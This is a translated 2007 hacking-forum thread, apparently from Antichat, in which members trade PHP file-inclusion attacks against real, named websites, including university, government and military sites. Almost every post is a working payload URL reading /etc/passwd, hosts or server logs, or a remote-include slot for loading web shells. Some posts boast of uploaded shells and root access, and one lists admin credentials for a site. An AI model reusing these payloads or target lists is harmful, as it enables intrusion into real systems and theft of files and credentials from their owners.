View full version: PHP Injections
Joker-jar
20.04.2007, 18:15
I found XSS and SQL inj, but I just can't see any include vulnerability...
http://www.rupivo.ru/papers.php?file=../../../../../../etc/passwd
http://quake.olympus.ru/q3/playerstat.php?config=../../../../../../../etc/passwd
guest3297
20.04.2007, 19:33
Let's run a test: I'm pinning this thread for a week; if it gets the same activity as the SQL Injections thread, I'll keep it.
+Post only:
+php/perl/jsp injections.
+Arbitrary code execution.
+Arbitrary command execution.
+Article: php injection (http://forum.antichat.ru/thread12123.html).
+Flooding will be strictly punished.
+Don't forget about the POST method: if you use the POST method, the bugs will live longer. Details here (http://forum.antichat.ru/thread24973.html).
For remote includes
post like this:
http://site.com/index.php?page=[url]
VampiRUS
21.04.2007, 04:04
http://www.giga-hamburg.de/index.php?file=../../../../../../../../../../../../../etc/passwd&folder=giga
I'll post, but I'm not so sure there will be the same activity.
InferNo23
21.04.2007, 10:55
http://primotechnology.com/index.php?art=../../../../../etc/passwd
already 210 views of the topic..
That made me happy :D
http://www.jff.org/download.php?file=../../../../../../etc/passwd - save and open
http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd
- save as passwd.txt and open
http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd
Remote include:
http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?
A bit off-topic: I got curious whether you can still find anything on Google with the query "r57shell - http-shell by RST/GHC":
http://www.webcreativestudio.com/?id=inter&param=doc_php&lang=2&doc_dop_param=../../../../../../../../etc/passwd
And view it in the page source =)
http://en.brazilny.org/force-download.php?file=../../../../../../etc/passwd
- save as passwd.txt and open
http://www.paru.cas.cz/index.php?file=../../../../../etc/passwd
http://www.lisboncouncil.net/force-download.php?file=/../../../../../../etc/passwd
save as passwd.txt and open
http://www.evolutionbook.com/eBook/Download.php?file=../../../../../../etc/passwd
save as passwd.txt and open
http://www.njff.no/index.php?file=../../../../../etc/passwd
http://adee.dental.tcd.ie/index.php?file=../../../../../../etc/passwd
:D
http://www.planet-travel.ru/index.php?file=../../../../../../../etc/passwd
0o
guest3297
21.04.2007, 14:11
OK, good, I approve of this activity so far.
http://robo-host.ru/bill/index.php?lang=../../../../../../../../../../../../../etc/passwd%00
The thread rules have been updated. (http://forum.antichat.ru/showpost.php?p=343192&postcount=2)
http://www.tinform.ru/price.php?file=../../../../../etc/passwd
I wanted to buy speakers from them, changed my mind =)
http://inet-sell.de/shop/catalog/elmar_start.php?file=../../../../../../../../etc/passwd
Here you go:
http://www.fz-juelich.de/portal/index.php?path=../../../../../../etc/passwd
More coming soon :) :)
I laughed :D
http://www.uploadpics.net/source.php?file=../../../../../../etc/passwd
melosi.it
http://www.melosi.it/script/source.php?FILE=../../../../../../etc/passwd
There's a ton of stuff here :)
http://www.foundationsofhope.com/modules.php?op=modload&name=phpbb2&file=../../../../../../../../../etc/passwd
And a bit here
http://michaelsleman.com/projects/php/index.php?file=../../../../../../etc/passwd
Here's another =)
http://www.mmon.org/view.php?file=../../../../../../../etc/passwd
ssk.ex0.uf0
22.04.2007, 11:13
http://www.sakhiepi.ru/news/view_article.php?num=/etc/passwd
=)
Robin_Hood
22.04.2007, 12:33
http://www.stumbleupon.com/etc/passwd
http://cvsweb.csociety.org/cgi-bin/cvsweb/etc/passwd?rev=1.3
http://www.bookladder.com/viewpage.php?file=../../../etc/passwd
[53x]Shadow
22.04.2007, 19:26
And here's my first ;)
A huge file:
http://blog.tice.de/beitrag.php?file=../.. /../../../../etc/passwd
And right away a second ;)
http://www.mcxapc.org/static.php?file=../../.. /../../../etc/passwd
Don't forget about the spaces!
Wow, look what I found!
www.cs.wright.edu
http://www.cs.wright.edu/~pmateti/InternetSecurity/Lectures/Password/etc-passwd.txt
Although this isn't a php-inj =)
Welcome to Taverna 1.5.1
http://taverna.sourceforge.net/index.php?doc=../../../../../../../etc/passwd
:) :)
I'm done with PHP inj for today :)
interesting thread
remote include =)
http://www.oscar.com.ua/index.php?action=[url]
including the c99 shell
ps: etc/passwd is big :)
KPOT_f!nd
23.04.2007, 00:07
my little contribution
That's all :)
http://www.vdgb.ru/?action=../../../../../../etc/passwd/
KPOT_f!nd
23.04.2007, 01:58
includes are still in fashion!
guest3297
23.04.2007, 02:54
For remote includes
post like this:
http://site.com/index.php?page=[url]
Local includes
http://www.weng.at/kirchenwirt/index.php?incl=../../../../../../etc/passwd
http://www.ktgracing.nl/uitslagen/index.php?incl=../../../../../../../etc/passwd
http://www.mdarui.com/index.php?incl=../../../../../../etc/passwd
The simplest article on PHP inj is here - http://forum.antichat.ru/thread12123.html. Thx to Green Bear :)
http://www.reichenthal.at/pages/service-include.php?incl=../../../../etc/passwd
I don't think this one was posted before... It's time to think about writing an anti-repost tool.
Remote include (I think :) )
http://www.digital-imogen.net/index.php?href=[url]
And a local one again
http://www.gck.geoid.de/table.php?href=../../../../../../etc/passwd
http://www.offinet.com/info/help/multiview.php?href=../../../../../../etc/passwd
InferNo23
23.04.2007, 17:58
Remote include (I think )
in the source:
<frame src="address here" name="mainFrame">
it just inserts a frame with your address, not an injection
http://pythonlib.pergamen.hu/examples/index.php?p=../../../../../../etc/passwd
Local includes
Not quite PHP Injection, but a bug
http://bbc.nvg.org/dir.php3?dir=../../../../../../etc/
Local includes (there's a looot here):
For those who know Chinese, a remote include:
http://elib.batol.net/incpag.php?incpag=[url]
Local:
Remote:
guest3297
24.04.2007, 23:06
It would be more interesting if you gave logs in the include, such as
error_log
access_log
ftp_log
etc....
Accordingly, I'll be giving pluses.
Show that you can do more than just trivially substitute
../../../../../../etc/passwd
and that you also understand this type of attack fully.
2 [ cash ] - ok
here we go:
http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=1&file=../../../error_log
http://foulard.ece.cornell.edu/index.php?loc=../../../../../etc/passwd
=\
VampiRUS
25.04.2007, 04:18
http://www.sembiz.com/index.php?addr=[url]
http://www2.isye.gatech.edu/~jjb/wh/download.php?Down=../../../../../etc/passwd
save and open
http://www.take2games.com/index.php?p=[url]
Local on .edu
http://cit.geneseo.edu/labs/index.php?pg=../../../../../../etc/passwd
Constantine
25.04.2007, 19:02
hmm... there's XSS there too
http://www.clustertech.com.cn/cn/main.php?file=/etc/passwd
http://www.clustertech.com.cn/cn/main.php?file=[any url]
XND IT Security :)
http://xndits.ru/index.php?module=articles&c=../../../../../etc/passwd&b=11&a=13
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/passwd
http://www.bilug.linux.it/php/out.htm?link=../../../../../../etc/passwd
Here
http://www.mondocitta.it/home/mondo.php?filename=../../../../../../etc/passwd
Not really in the mood :) :)
Finally, PHP-inj! It's been nothing but SQL and more SQL! :) http://www.hclada.ru/turnir11/2005/index.php?c=[url]
I decided to read up on billiards)
http://billiard4u.ru/instructions.php?menu=tournament&submenu=../../../../../etc/passwd%00
error_log is one level down; it doesn't load for me, but there's no error...
didn't look for the rest
P.S.: the POST method works
www.molrh.dimetra.ru
A site about the life of young people in the Republic of Khakassia.
http://www.molrh.dimetra.ru/mol.php?p=../../../../etc/passwd
http://www.molrh.dimetra.ru/mol.php?p=../../../../etc/syslog.conf
http://www.molrh.dimetra.ru/mol.php?p=../../../../etc/ftpusers
http://www.molrh.dimetra.ru/mol.php?p=../../../../usr/local/etc/proftpd.conf
Admin panel
Forum admin panel
http://www.molrh.dimetra.ru/for/admin/admin.php
***********************************************
login:login
password:pass
***********************************************
Xex
ЛифчиС5СВ
07.05.2007, 11:53
I should slowly start joining this guild too :)
http://schwein.ru/news/index.php?page=http://
http://ragingbull.quote.com/mboard/viewrbml.cgi?file=../../../../../../../../../../etc/passwd
first php-inj
http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd
Berlin police?
___________
And one more right away
http://www.neumann.com/download.php?download=../../../../etc/passwd
Constantine
09.05.2007, 00:08
Remote
http://euroinvest-vertrieb.de/include.php?id=17&a=Keine+Ahnung.&game=16&w=1&c=2&ziel=http://rambler.ru
www.clinlab-kafedra.ru
Training of specialists for Russia's laboratory service.
.................................................. .....................
http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/hosts
http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/passwd
http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/ftpusers
http://www.clinlab-kafedra.ru/main.php?file=../../../../etc/syslog.conf
*****************************************
File viewing
http://www.rjkf.ru/forum.php?action=read&name=forum.php&type=m&index=1
:)
http://www.feuerwehr-aachen.de/fws_showfile.php?sfile=[url]
went through PHP-Nuke)
www.wolfproject.net/modules/Forums/admin/index.php?phpbb_root_path=[url]
www.packpage.de/modules/Forums/admin/index.php?phpbb_root_path=[url]
Constantine
13.05.2007, 23:09
something CS-related
http://www.fofg.action-games.de/include.php?file=/etc/passwd
don't forget that besides etc there is also bin
http://www.nexgen-fs.net/include.php?file=/bin/bash
http://www.nexgen-fs.net/include.php?file=/bin/sh
and of course /etc/passwd
http://www.nexgen-fs.net/include.php?file=/etc/passwd
Local includes don't rule.
beerbear
15.05.2007, 04:41
First)
http://www.geneseo.edu/news/nrap.php?pg=../../../../../../etc/passwd
Yeah guys, there's a lot to learn from you.
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/hosts
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/passwd
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/ftpusers
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../etc/syslog.conf
beerbear, is Google that small? Already posted :mad:
Constantine
19.05.2007, 19:40
http://www.star-corp.de/include.php?file=/etc/passwd
http://www.rwies1406.de/include.php?file=/etc/passwd
For thrill-seekers =))
http://www.lu2705.de/include.php?file=/bin/sh
ForWarD-Hack
21.05.2007, 12:24
http://www.apsny.ru/history/history.php?page=../forum/
the admins are hilarious.. :)) the root passwords in the 1st of the databases are empty.. +)
ForWarD-Hack
21.05.2007, 13:08
http://ecsg.free.fr/index.php?page=[local]
include ""; =)
http://www.24hoursupport.com/index.php?page=[local]
fopen($menu_file_name, "r");
ForWarD-Hack
21.05.2007, 14:05
http://lib.nbu.bg/eng/index.php?page=..\..\..\..\boot.ini
Windows ;)
http://www.nnhs.net/library/show.php?page=[local]
but if you want, it can be made remote ;)
http://www.egir.dk/index.php?page=/etc/passwd
That's all for now... more coming soon.. I've still got lots of SQL ones :(
everyone's favourite Dom-2, though only WAP for now...
http://wap.dom2.ru/index.php?area=../../../../../../../../../etc/passwd%00
or
http://wap.dom2.ru:81/index.php?area=../../../../../../../../../etc/passwd%00
http://www.33rus.ru/modules/Forums/admin/index.php?phpbb_root_path=[url]?
1.
http://www.hd82.com/hd82/?doc=[url]
2.
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/passwd
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/hosts
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/syslog.conf
http://www.proteger.org.ar/download.php?file=[local]
http://www.starcat-dev.de/display.php?file=24&lan=[site]
in place of [site], correspondingly, the address of a site of the form http://site.narod.ru that hosts a shell named shortnews.txt
P.S. by the way, thanks to this injection I got root, without using exploits and without cracking hashes
These aren't includes, they're require_once, but apparently there's no difference..
1.
http://www.photoconcept.ch/~scoutsmeyrin/index.php?require=[url]
2.
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/passwd
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/hosts
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/syslog.conf
3.
http://www.pandora-asia.org/panprojects.php?main=[url]
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/passwd
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/hosts
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/syslog.conf
1.
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/passwd
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/hosts
2.
http://www.marionovak.com/proba/include.php?includefile=[url]
3.
http://www.dominoua.com.ua/build.php?file=[url]
4.
http://www.kiyavia.crimea.ua/index.php?[url]
http://www.ssa.ro/domenii/index.php?main=../../../../../../../../etc/passwd
http://www.host-power.de/html/index.php?main=[url]
1.
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/passwd
http://www.dexa.org/previous/dexa2004/index.php?include=../../../../../../etc/hosts
2. Windows NT.
http://www.uetigers.stier.org/index.php?incpage=[url] (without .php)
3. Linux.
http://sgfma.org/main.php?incfile=[url]
4.
http://www.parentservices.org/content.php?url=../../../../../../etc/syslog.conf
http://www.parentservices.org/content.php?url=../../../../../../etc/hosts
http://www.parentservices.org/content.php?url=../../../../../../etc/passwd
5. Linux.
http://www.soslevasseur.org/event.php?url=[url]
http://simleyvolleyball.com/index.php?main=[url]
Brazilian gov...
http://www.tre-to.gov.br/conteudo.php?pg=/etc/passwd
instead of... /etc/passwd you can try substituting a shell URL, but it didn't work for me, since it's Brazil and there's an ocean between us... as an option, you can try a shell from some Brazilian server (for beginners: it's better for the shell to have an extension such as txt)...
btw... nice...
~!DoK_tOR!~
31.05.2007, 21:11
no idea what this site is =\
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../../etc/passwd&knap=6
1.
http://www.business-india.in/articles.php?file=../../../../../etc/passwd
http://www.business-india.in/articles.php?file=../../../../../etc/hosts
http://www.business-india.in/articles.php?file=../../../../../etc/syslog.conf
2.
http://rajbhavan.maharashtra.gov.in/english/news/popupNewsShow1.php?file=/../../../../etc/passwd
http://rajbhavan.maharashtra.gov.in/english/news/popupNewsShow1.php?file=/../../../../etc/hosts
http://rajbhavan.maharashtra.gov.in/english/news/popupNewsShow1.php?file=/../../../../etc/syslog.conf
~!DoK_tOR!~
04.06.2007, 02:17
=\\
http://www.motiveeducation.com/articles.php?file=../../../../../../etc/passwd
http://www.motiveeducation.com/articles.php?file=../../../../../etc/hosts
1. Doesn't seem to have been posted :)
http://www.cs.utb.edu/main.php?page=../../../../../../etc/passwd
http://www.cs.utb.edu/main.php?page=../../../../../../etc/hosts
=\
http://www.xx.inattack.ru/index.php?page=index.php%00
~!DoK_tOR!~
05.06.2007, 19:07
=\\
1.
http://www.playnova.eu/iframe.php?include=../../../../../../var/log/httpd/access_log (empty)
2.
http://www.tigra-tuning.eu/main.php?inc=../../../../../../etc/hosts
http://www.tigra-tuning.eu/main.php?inc=../../../../../../etc/services
http://xndcrew.org/index.php?module=../../../../etc/passwd
Doesn't seem to have been posted yet
http://www.dekoempfer.com/index.php?c=[URL]
and someone has already uploaded a shell there :) strange, only the one folder where the shell was uploaded has write permissions :)
http://www.dekoempfer.com/activate/web.php
root
own3d
The_HuliGun
08.06.2007, 08:08
Here's an edu
http://www.masferrer.edu.sv/index.php?id=[shell]
http://www.school-izvestia.ru/press-vyp.php?id=2&redir_url=[url]
The_HuliGun
08.06.2007, 17:45
And here's a nice .gov
http://www.cso.gov.tr/content.php?id=[shell]
http://xndcrew.org/index.php?module=../../../../etc/passwd
http://xndits.ru/index.php?module=../../../../../etc/passwd&c=tricks and here's a follow-up
http://www.trinitysf.org/index.php?bodypage=[url]
~!DoK_tOR!~
08.06.2007, 22:50
=\\
~!DoK_tOR!~
08.06.2007, 23:30
=\
http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/passwd%00
http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/hosts%00
http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/group%00
http://www.worldaccessnet.com/index.php?include=./../../../../../../../../etc/services%00
~!DoK_tOR!~
08.06.2007, 23:59
=\\
~!DoK_tOR!~
09.06.2007, 05:59
=\\
The_HuliGun
09.06.2007, 10:44
http://www.fincert.org/?page=[shell]
http://www.exac.cz/Pinnacle/product2.php?label=PCTV%20Dual%20DVB-T%20Pro%20PCI&soubor=[url]
The_HuliGun
09.06.2007, 11:22
http://www.mskar.org/atlantis.php?page=[shell]
http://www.capoeirapraha.cz/index.php?zobraz_stranku=[url]
1. Windows NT.
http://www.cbtij.org.br/home.php?page=[url]
2. No idea what...
http://www.cineweb.com.br/index_include.php?path=[url]
and the last one for today))
http://www.adnanibrahim.net/index_ar.php?nextPage=[url]
The_HuliGun
09.06.2007, 22:19
More edu
http://math.uoregon.edu/photos/index.php?photo=../../../../../../../../../../etc/passwd
http://math.uoregon.edu/photos/index.php?photo=../../../../../../../../../../etc/group
http://math.uoregon.edu/photos/index.php?photo=../../../../../../../../../../etc/hosts
Anti-repost tool http://chingis.pochta.ru/1.txt
Constantine
10.06.2007, 00:06
Copyrights on the product, please =\
The_HuliGun
10.06.2007, 09:12
The_HuliGun
10.06.2007, 13:50
http://power-soccer.hostarea.org/?page=[shell]
http://www.inomarka54.ru/index2.php?[url]
1. Didn't find the logs :\
The_HuliGun
10.06.2007, 14:31
http://www.cimav.edu.mx/posgrado.php?load=../../../../../../../../../../../../../etc/passwd
2.
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../../../../../../../var/log/httpd/access_log (I think :) )
http://www.math.uconn.edu/~stein/index_plain.php?content=../../../../../../../../../../../../var/log/httpd/error_log (I think :) )
www.yewsoft.com/page.php?includefile=[url]
The_HuliGun
10.06.2007, 16:32
http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../../../../../../etc/passwd
looks like everyone has gone after edu))
well, I won't fall behind either.
http://www.wccs.edu/index.php?[url]
=~=~=~
http://ai.isi.edu/index.php?module=seminars/index&submodule=../../../../../etc/passwd
might be a repost, no idea
http://sdc.missouri.edu/index.php?page=../../../etc/passwd
The_HuliGun
10.06.2007, 21:55
http://power-soccer.hostarea.org/?page=[shell]
~!DoK_tOR!~
10.06.2007, 22:23
=\\
http://www.ourcs.org.uk/index.php?content=../../../../../../etc/passwd
http://www.ourcs.org.uk/index.php?content=../../../../../../etc/group
http://www.ourcs.org.uk/index.php?content=../../../../../../etc/hosts
http://www.ourcs.org.uk/index.php?content=../../../../../../etc/services
http://www.sbpep.org/index.php?content=../../../../../../etc/passwd
http://www.sbpep.org/index.php?content=../../../../../../etc/group
http://www.sbpep.org/index.php?content=../../../../../../etc/hosts
http://www.sbpep.org/index.php?content=../../../../../../etc/services
http://www.sbpep.org/index.php?content=../../../../../../etc/ftpusers
http://www.sbpep.org/index.php?content=../../../../../../etc/syslog.conf
The_HuliGun
10.06.2007, 22:33
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../etc/passwd
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../etc/hosts
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../etc/group
~!DoK_tOR!~
10.06.2007, 23:15
=\\
http://primotechnology.com/index.php?art=../../../../../../etc/passwd
http://primotechnology.com/index.php?art=../../../../../../etc/group
http://primotechnology.com/index.php?art=../../../../../../etc/hosts
http://primotechnology.com/index.php?art=../../../../../../etc/services
http://primotechnology.com/index.php?art=../../../../../../etc/syslog.conf
http://koolfind.com/index.cgi?file=../../../../../../etc/passwd
http://koolfind.com/index.cgi?file=../../../../../../etc/group
http://koolfind.com/index.cgi?file=../../../../../../etc/hosts
http://koolfind.com/index.cgi?file=../../../../../../etc/services
http://koolfind.com/index.cgi?file=../../../../../../etc/syslog.conf
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/passwd&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/group&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/hosts&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/services&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/syslog.conf&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/ftpusers&lang=1&declara=4
KPOT_f!nd
10.06.2007, 23:47
http://www.ippn.org/article.php?ID=../../../../../../../../../../../../../../../../../../../../etc/passwd
also:
syslog.conf/shells instead of passwd
KPOT_f!nd
11.06.2007, 01:55
http://www.avto-bike.ru/osn.php/?id=../../../../../../../../../../../../../../../../../../../../etc/passwd&tema=guard
http://www.newsall.net.ru/news02.php?menu=no&news=[url]
http://www.cs.wright.edu/~pmateti/InternetSecurity/Lectures/Password/etc-passwd.txt
KPOT_f!nd
11.06.2007, 04:28
PHP-INCLUDE[anti-repost] (http://www.downloads.xclan.ru/php-include.txt)
We work strictly from PHP-INCLUDE[anti-repost]
PHP-INCLUDE[anti-repost]: sorted, duplicates removed
I'll take on maintaining PHP-INCLUDE[anti-repost] and doing the [update]
The_HuliGun
11.06.2007, 10:23
http://acvecc.org/page.php?page=../../../../../../../../../etc/passwd
http://acvecc.org/page.php?page=../../../../../../../../../etc/hosts
http://acvecc.org/page.php?page=../../../../../../../../../etc/group
http://acvecc.org/page.php?page=../../../../../../../../../etc/services
The_HuliGun
11.06.2007, 10:28
http://www.uganda.sfgd.org/index.php?page=../../../../../../../../../../../../etc/passwd
http://www.uganda.sfgd.org/index.php?page=../../../../../../../../../../../../etc/group
http://eng.sttu.ac.ir/main.php?BodyFile=../../../../../etc/passwd
http://eng.sttu.ac.ir/main.php?BodyFile=[url]
http://www.thebigloop.com/portal/display.php?page=../../../../../etc/passwd
http://www.martechportal.com/client/mt.php?ads=0&bodyfile=../../../../../etc/passwd&ma=Y
1. file_get_contents()
http://codebrowse.com/view_file.php?path=../../../../../../etc/passwd
http://codebrowse.com/view_file.php?path=../../../../../../etc/hosts
http://codebrowse.com/view_file.php?path=../../../../../../etc/group
http://codebrowse.com/view_file.php?path=../../../../../../etc/services
http://codebrowse.com/view_file.php?path=../../../../../../etc/syslog.conf
The_HuliGun
11.06.2007, 20:55
Here you go
http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/passwd
http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/group
http://iaald.org/cee/index.php?page=http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/passwd
http://iaald.org/cee/index.php?page=http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/group
http://www.teamabrisud.org/index.php?page=../../../../../../../../../../../../../etc/passwd
http://www.teamabrisud.org/index.php?page=../../../../../../../../../../../../../etc/group
http://tztour.ru/sanatory.php?[url]
http://romadan.bdk.com.ru/index_files/texts/txt.php?text=[url]
http://solarworld.ru/map.php?p=[url]&t=6
http://www.heraeus-wch.ru/load.php?part=[url]
1. include().
http://www.ritterbrindes.com.br/new/index.php?file=/etc/passwd
http://www.ritterbrindes.com.br/new/index.php?file=/etc/hosts
http://www.ritterbrindes.com.br/new/index.php?file=/etc/group
http://www.ritterbrindes.com.br/new/index.php?file=/etc/services
http://www.ritterbrindes.com.br/new/index.php?file=/etc/syslog.conf
2. include().
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/passwd
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/hosts
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/group
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/services
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/syslog.conf
3. include().
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/passwd
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/hosts
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/group
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/services
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/syslog.conf
The_HuliGun
12.06.2007, 22:16
.ee
http://www.sauepuit.ee/index.php?page=[url]
The_HuliGun
12.06.2007, 22:28
http://www.whalecall.org/index.php?page=../../../../../../../../../../../etc/passwd
http://www.whalecall.org/index.php?page=../../../../../../../../../../../etc/hosts
The_HuliGun
12.06.2007, 22:36
http://thecrums.org/?page=../../../../../../etc/passwd
http://thecrums.org/?page=../../../../../../etc/hosts
http://thecrums.org/?page=../../../../../../etc/group
http://thecrums.org/?page=../../../../../../var/log/httpd/access_log
satana8920
13.06.2007, 00:28
PLAYING FOR HIGH STAKES!!!
.GOV
http://www.mli.nih.gov/funding/assay_dev_fund_res_cycle3.php?=
http://www.nassaucountyny.gov/login/newusrfrm.php?=
http://www-cmls.llnl.gov/?url=
http://www.doc.nv.gov/news/display.php?article_id=
http://digitalpreservation.gov/contact.php?=
http://health.utah.gov/hflcra/rules/rulepage.php?Rule=
AND NOW THE MILITARY
.MIL
http://knowledgebase.msiac.dmso.mil/day.php?&catid=&d=31&m=7&w=6&wd=0&y=2005&s=
http://www.nau.usace.army.mil/business/products.php?m=
http://rad.usuhs.mil/rad/?=
And some small stuff
.EDU
http://rad.usuhs.edu/medpix/menu/main_menu.html?=
and what's high-stakes about this?
you just found sites with errors, 5 minutes of work!!!!
http://gold.chelkon.ru/index.php?doc=../../../../../etc/passwd
The_HuliGun
13.06.2007, 08:00
Guys, I deliberately checked all the links and didn't find a single include. Why post messages like this?
P.S. Begging for rep is dumb, to say the least; you'd do better to get busy with something useful and help somebody...
http://www.fashionistastheshow.com/index.php?node=../../../../../etc/passwd
http://www.e-mela.com/viewPage.php?page=[url]
http://www.britishoppression.com/index.php?page=[url]
here's another one
http://www.linux-hogyan.hu/indexen.php?page=[url]
a fruitful day today))
http://www.bookdjralph.com/index.php?Page=[url]
http://prairial.free.fr/calendrier/calendrier.php?lien=[url]
The Simpsons))
http://www.springfieldspringfield.co.uk/main.php?view=../../../../../etc/passwd
http://www.gonzographix.com/HTML/index.php?page=[url]
http://bodoradio.com/modulos/index.php?page=[url]
http://www.dbrage.net/index6.php?page=[url]
Site: aa.com // Airline ticket sales.
http://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../etc/passwd
http://infodoc.3x.ro/index.php?sMain=[url]
http://www.animed.us/V.php?id=[url]
~!DoK_tOR!~
14.06.2007, 00:33
=\\
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/passwd
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/hosts
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/syslog.conf
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/services
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/group
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/passwd
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/hosts
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/syslog.conf
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/services
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/group
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/ftpusers
~!DoK_tOR!~
14.06.2007, 01:26
=\\
http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/passwd&tsid=1
http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/hosts&tsid=1
http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/services&tsid=1
http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/syslog.conf&tsid=1
http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/passwd
http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/hosts
http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/services
http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/syslog.conf
~!DoK_tOR!~
14.06.2007, 02:38
=\\
http://finance.anali3.info/news02.php?menu=yes&page=1&news=[site.ru/shell.php]
~!DoK_tOR!~
14.06.2007, 03:02
=\\
http://security.onme.info/news01.php?menu=yes&page=1&news=[shell.php]
~!DoK_tOR!~
14.06.2007, 03:09
=\\
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/passwd
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/hosts
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/services
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/syslog.conf
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/group
~!DoK_tOR!~
14.06.2007, 03:37
=\\
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/passwd
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/hosts
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/services
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/syslog.conf
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/group
~!DoK_tOR!~
14.06.2007, 03:38
=\\
http://www.hendribustan.com/index.php?mode=[shell.php]
~!DoK_tOR!~
14.06.2007, 04:00
=\\
http://www.ufabc.edu.br/index.php?p=../../../../../etc/passwd
http://www.ufabc.edu.br/index.php?p=../../../../../etc/hosts
http://www.ufabc.edu.br/index.php?p=../../../../../etc/services
http://www.ufabc.edu.br/index.php?p=../../../../../etc/syslog.conf
http://www.ufabc.edu.br/index.php?p=../../../../../etc/group
http://www.lib.pte.hu/main.php?menu=services&article=[url]
~!DoK_tOR!~
15.06.2007, 04:52
=\\
http://www.avtos.net.ru/news02.php?menu=yes&page=1&news=[shell.php]
KPOT_f!nd
15.06.2007, 05:09
PHP-INCLUDE[anti-repost] (http://www.downloads.xclan.ru/php-include.php)
Last Update 15.06.07
We work strictly from PHP-INCLUDE[anti-repost]
PHP-INCLUDE[anti-repost]: sorted, duplicates removed
Let's work strictly from PHP-INCLUDE[anti-repost], shall we!?
http://www.klostertische.eu/index.php?page=../../../etc/passwd
http://www.klostertische.eu/index.php?page=../../../etc/services
http://www.klostertische.eu/index.php?page=../../../etc/syslog.conf
=\
http://kcou.missouri.edu/index.php?page=../../etc/passwd
..
~!DoK_tOR!~
16.06.2007, 02:32
=\\
